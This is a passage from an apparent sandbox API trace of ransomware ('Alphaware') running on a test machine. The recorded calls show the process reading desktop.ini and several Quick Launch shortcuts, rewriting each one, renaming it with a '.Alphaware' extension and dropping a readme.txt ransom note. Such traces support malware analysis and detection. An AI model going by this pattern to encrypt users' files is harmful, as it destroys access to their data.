ftLastAccessTime.dwLowDateTime=0x799de350, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x7e143190, ftLastWriteTime.dwHighDateTime=0x1ca043e, nFileSizeHigh=0x0, nFileSizeLow=0x110, dwReserved0=0x0, dwReserved1=0x0, cFileName="Window Switcher.lnk", cAlternateFileName="WINDOW~1.LNK")) returned 1 [0092.920] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e830 | out: lpFindFileData=0x23e830*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0092.920] FindClose (in: hFindFile=0xd8a310 | out: hFindFile=0xd8a310) returned 1 [0092.920] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e758) returned 1 [0092.920] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e978) returned 1 [0092.920] SetFileAttributesW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\desktop.ini", dwFileAttributes=0x80) returned 1 [0092.921] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e818) returned 1 [0092.921] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\desktop.ini" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\internet explorer\\quick launch\\desktop.ini"), fInfoLevelId=0x0, lpFileInformation=0x24022b0 | out: lpFileInformation=0x24022b0*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x799de350, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x799de350, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x4d24b360, ftLastWriteTime.dwHighDateTime=0x1d7b064, nFileSizeHigh=0x0, nFileSizeLow=0xdd)) returned 1 [0092.921] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e7c8) returned 1 [0092.921] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e8a8) returned 1 [0092.921] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\desktop.ini" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\internet explorer\\quick launch\\desktop.ini"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x250 [0092.921] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e818) returned 1 [0092.921] GetFileSize (in: hFile=0x250, lpFileSizeHigh=0x23ea28 | out: lpFileSizeHigh=0x23ea28*=0x0) returned 0xdd [0092.921] ReadFile (in: hFile=0x250, lpBuffer=0x2402668, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x23e958, lpOverlapped=0x0 | out: lpBuffer=0x2402668*, lpNumberOfBytesRead=0x23e958*=0xdd, lpOverlapped=0x0) returned 1 [0092.999] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e7d8) returned 1 [0092.999] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\desktop.ini" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\internet explorer\\quick launch\\desktop.ini"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x250 [0093.000] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e748) returned 1 [0093.001] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e748) returned 1 [0093.002] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\desktop.ini" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\internet explorer\\quick launch\\desktop.ini"), fInfoLevelId=0x0, lpFileInformation=0x23ea70 | out: lpFileInformation=0x23ea70*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x799de350, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x799de350, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x89a1a5a0, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x1f4)) returned 1 [0093.002] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e6f8) returned 1 [0093.002] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\desktop.ini" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\internet explorer\\quick launch\\desktop.ini"), lpNewFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\desktop.ini.Alphaware" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\internet explorer\\quick launch\\desktop.ini.alphaware")) returned 1 [0093.003] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e868) returned 1 [0093.003] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\readme.txt" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\internet explorer\\quick launch\\readme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x250 [0093.004] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e7d8) returned 1 [0093.005] SetFileAttributesW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\Launch Internet Explorer Browser.lnk", dwFileAttributes=0x80) returned 1 [0093.008] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e818) returned 1 [0093.008] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\Launch Internet Explorer Browser.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\internet explorer\\quick launch\\launch internet explorer browser.lnk"), fInfoLevelId=0x0, lpFileInformation=0x24856f8 | out: lpFileInformation=0x24856f8*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x4d24b360, ftCreationTime.dwHighDateTime=0x1d7b064, ftLastAccessTime.dwLowDateTime=0x4d24b360, ftLastAccessTime.dwHighDateTime=0x1d7b064, ftLastWriteTime.dwLowDateTime=0x4d24b360, ftLastWriteTime.dwHighDateTime=0x1d7b064, nFileSizeHigh=0x0, nFileSizeLow=0x5a7)) returned 1 [0093.008] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e7c8) returned 1 [0093.008] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e8a8) returned 1 [0093.009] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\Launch Internet Explorer Browser.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\internet explorer\\quick launch\\launch internet explorer browser.lnk"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x250 [0093.009] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e818) returned 1 [0093.009] GetFileSize (in: hFile=0x250, lpFileSizeHigh=0x23ea28 | out: lpFileSizeHigh=0x23ea28*=0x0) returned 0x5a7 [0093.009] ReadFile (in: hFile=0x250, lpBuffer=0x2486070, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x23e958, lpOverlapped=0x0 | out: lpBuffer=0x2486070*, lpNumberOfBytesRead=0x23e958*=0x5a7, lpOverlapped=0x0) returned 1 [0093.035] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e7d8) returned 1 [0093.035] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\Launch Internet Explorer Browser.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\internet explorer\\quick launch\\launch internet explorer browser.lnk"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x250 [0093.036] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e748) returned 1 [0093.038] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e748) returned 1 [0093.038] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\Launch Internet Explorer Browser.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\internet explorer\\quick launch\\launch internet explorer browser.lnk"), fInfoLevelId=0x0, lpFileInformation=0x23ea70 | out: lpFileInformation=0x23ea70*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4d24b360, ftCreationTime.dwHighDateTime=0x1d7b064, ftLastAccessTime.dwLowDateTime=0x4d24b360, ftLastAccessTime.dwHighDateTime=0x1d7b064, ftLastWriteTime.dwLowDateTime=0x89a66860, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x860)) returned 1 [0093.038] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e6f8) returned 1 [0093.038] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\Launch Internet Explorer Browser.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\internet explorer\\quick launch\\launch internet explorer browser.lnk"), lpNewFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\Launch Internet Explorer Browser.lnk.Alphaware" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\internet explorer\\quick launch\\launch internet explorer browser.lnk.alphaware")) returned 1 [0093.049] SetFileAttributesW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\Microsoft Outlook.lnk", dwFileAttributes=0x80) returned 1 [0093.062] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e818) returned 1 [0093.062] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\Microsoft Outlook.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\internet explorer\\quick launch\\microsoft outlook.lnk"), fInfoLevelId=0x0, lpFileInformation=0x25089b8 | out: lpFileInformation=0x25089b8*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x5021c250, ftCreationTime.dwHighDateTime=0x1d70912, ftLastAccessTime.dwLowDateTime=0x5021c250, ftLastAccessTime.dwHighDateTime=0x1d70912, ftLastWriteTime.dwLowDateTime=0x502423b0, ftLastWriteTime.dwHighDateTime=0x1d70912, nFileSizeHigh=0x0, nFileSizeLow=0x4ce)) returned 1 [0093.062] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e7c8) returned 1 [0093.063] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e8a8) returned 1 [0093.063] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\Microsoft Outlook.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\internet explorer\\quick launch\\microsoft outlook.lnk"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x250 [0093.063] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e818) returned 1 [0093.063] GetFileSize (in: hFile=0x250, lpFileSizeHigh=0x23ea28 | out: lpFileSizeHigh=0x23ea28*=0x0) returned 0x4ce [0093.063] ReadFile (in: hFile=0x250, lpBuffer=0x25091d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x23e958, lpOverlapped=0x0 | out: lpBuffer=0x25091d8*, lpNumberOfBytesRead=0x23e958*=0x4ce, lpOverlapped=0x0) returned 1 [0093.090] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e7d8) returned 1 [0093.090] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\Microsoft Outlook.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\internet explorer\\quick launch\\microsoft outlook.lnk"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x250 [0093.091] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e748) returned 1 [0093.093] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e748) returned 1 [0093.093] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\Microsoft Outlook.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\internet explorer\\quick launch\\microsoft outlook.lnk"), fInfoLevelId=0x0, lpFileInformation=0x23ea70 | out: lpFileInformation=0x23ea70*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5021c250, ftCreationTime.dwHighDateTime=0x1d70912, ftLastAccessTime.dwLowDateTime=0x5021c250, ftLastAccessTime.dwHighDateTime=0x1d70912, ftLastWriteTime.dwLowDateTime=0x89afede0, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x734)) returned 1 [0093.093] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e6f8) returned 1 [0093.093] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\Microsoft Outlook.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\internet explorer\\quick launch\\microsoft outlook.lnk"), lpNewFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\Microsoft Outlook.lnk.Alphaware" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\internet explorer\\quick launch\\microsoft outlook.lnk.alphaware")) returned 1 [0093.094] SetFileAttributesW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\Shows Desktop.lnk", dwFileAttributes=0x80) returned 1 [0093.095] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e818) returned 1 [0093.095] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\Shows Desktop.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\internet explorer\\quick launch\\shows desktop.lnk"), fInfoLevelId=0x0, lpFileInformation=0x258b148 | out: lpFileInformation=0x258b148*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x799de350, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x799de350, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x7e11d030, ftLastWriteTime.dwHighDateTime=0x1ca043e, nFileSizeHigh=0x0, nFileSizeLow=0x122)) returned 1 [0093.095] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e7c8) returned 1 [0093.095] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e8a8) returned 1 [0093.095] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\Shows Desktop.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\internet explorer\\quick launch\\shows desktop.lnk"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x250 [0093.096] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e818) returned 1 [0093.096] GetFileSize (in: hFile=0x250, lpFileSizeHigh=0x23ea28 | out: lpFileSizeHigh=0x23ea28*=0x0) returned 0x122 [0093.096] ReadFile (in: hFile=0x250, lpBuffer=0x258b5a0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x23e958, lpOverlapped=0x0 | out: lpBuffer=0x258b5a0*, lpNumberOfBytesRead=0x23e958*=0x122, lpOverlapped=0x0) returned 1 [0093.127] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e7d8) returned 1 [0093.127] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\Shows Desktop.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\internet explorer\\quick launch\\shows desktop.lnk"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x250 [0093.128] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e748) returned 1 [0093.129] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e748) returned 1 [0093.129] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\Shows Desktop.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\internet explorer\\quick launch\\shows desktop.lnk"), fInfoLevelId=0x0, lpFileInformation=0x23ea70 | out: lpFileInformation=0x23ea70*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x799de350, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x799de350, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x89b4b0a0, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x260)) returned 1 [0093.129] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e6f8) returned 1 [0093.130] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\Shows Desktop.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\internet explorer\\quick launch\\shows desktop.lnk"), lpNewFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\Shows Desktop.lnk.Alphaware" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\internet explorer\\quick launch\\shows desktop.lnk.alphaware")) returned 1 [0093.131] SetFileAttributesW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\Window Switcher.lnk", dwFileAttributes=0x80) returned 1 [0093.132] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e818) returned 1 [0093.132] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\Window Switcher.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\internet explorer\\quick launch\\window switcher.lnk"), fInfoLevelId=0x0, lpFileInformation=0x240b248 | out: lpFileInformation=0x240b248*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x799de350, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x799de350, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x7e143190, ftLastWriteTime.dwHighDateTime=0x1ca043e, nFileSizeHigh=0x0, nFileSizeLow=0x110)) returned 1 [0093.132] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e7c8) returned 1 [0093.132] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e8a8) returned 1 [0093.132] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\Window Switcher.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\internet explorer\\quick launch\\window switcher.lnk"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x250 [0093.132] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e818) returned 1 [0093.132] GetFileSize (in: hFile=0x250, lpFileSizeHigh=0x23ea28 | out: lpFileSizeHigh=0x23ea28*=0x0) returned 0x110 [0093.132] ReadFile (in: hFile=0x250, lpBuffer=0x240b688, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x23e958, lpOverlapped=0x0 | out: lpBuffer=0x240b688*, lpNumberOfBytesRead=0x23e958*=0x110, lpOverlapped=0x0) returned 1 [0093.159] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e7d8) returned 1 [0093.159] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\Window Switcher.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\internet explorer\\quick launch\\window switcher.lnk"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x250 [0093.161] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e748) returned 1 [0093.162] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e748) returned 1 [0093.162] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\Window Switcher.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\internet explorer\\quick launch\\window switcher.lnk"), fInfoLevelId=0x0, lpFileInformation=0x23ea70 | out: lpFileInformation=0x23ea70*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x799de350, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x799de350, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x89b97360, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x248)) returned 1 [0093.162] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e6f8) returned 1 [0093.162] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\Window Switcher.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\internet explorer\\quick launch\\window switcher.lnk"), lpNewFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\Window Switcher.lnk.Alphaware" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\internet explorer\\quick launch\\window switcher.lnk.alphaware")) returned 1 [0093.175] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23ea58) returned 1 [0093.175] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\*" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\internet explorer\\quick launch\\*"), lpFindFileData=0x23e800 | out: lpFindFileData=0x23e800*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x795fff90, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x89bbd4c0, ftLastAccessTime.dwHighDateTime=0x1d9897a, ftLastWriteTime.dwLowDateTime=0x89bbd4c0, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xd8a310 [0093.175] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e830 | out: lpFindFileData=0x23e830*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x795fff90, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x89bbd4c0, ftLastAccessTime.dwHighDateTime=0x1d9897a, ftLastWriteTime.dwLowDateTime=0x89bbd4c0, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0093.175] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e830 | out: lpFindFileData=0x23e830*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x799de350, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x799de350, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x89a1a5a0, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x1f4, dwReserved0=0x0, dwReserved1=0x0, cFileName="desktop.ini.Alphaware", cAlternateFileName="DESKTO~1.ALP")) returned 1 [0093.175] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e830 | out: lpFindFileData=0x23e830*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4d24b360, ftCreationTime.dwHighDateTime=0x1d7b064, ftLastAccessTime.dwLowDateTime=0x4d24b360, ftLastAccessTime.dwHighDateTime=0x1d7b064, ftLastWriteTime.dwLowDateTime=0x89a66860, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x860, dwReserved0=0x0, dwReserved1=0x0, cFileName="Launch Internet Explorer Browser.lnk.Alphaware", cAlternateFileName="LAUNCH~1.ALP")) returned 1 [0093.175] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e830 | out: lpFindFileData=0x23e830*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5021c250, ftCreationTime.dwHighDateTime=0x1d70912, ftLastAccessTime.dwLowDateTime=0x5021c250, ftLastAccessTime.dwHighDateTime=0x1d70912, ftLastWriteTime.dwLowDateTime=0x89afede0, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x734, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft Outlook.lnk.Alphaware", cAlternateFileName="MICROS~1.ALP")) returned 1 [0093.175] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e830 | out: lpFindFileData=0x23e830*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x89a1a5a0, ftCreationTime.dwHighDateTime=0x1d9897a, ftLastAccessTime.dwLowDateTime=0x89a1a5a0, ftLastAccessTime.dwHighDateTime=0x1d9897a, ftLastWriteTime.dwLowDateTime=0x89a1a5a0, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x49d, dwReserved0=0x0, dwReserved1=0x0, cFileName="readme.txt", cAlternateFileName="")) returned 1 [0093.175] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e830 | out: lpFindFileData=0x23e830*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x799de350, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x799de350, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x89b4b0a0, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x260, dwReserved0=0x0, dwReserved1=0x0, cFileName="Shows Desktop.lnk.Alphaware", cAlternateFileName="SHOWSD~1.ALP")) returned 1 [0093.175] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e830 | out: lpFindFileData=0x23e830*(dwFileAttributes=0x12, ftCreationTime.dwLowDateTime=0x795fff90, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x796260f0, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x119ccee, ftLastWriteTime.dwHighDateTime=0x1cb8927, nFileSizeHigh=0x0, nFileSizeLow=0x0, 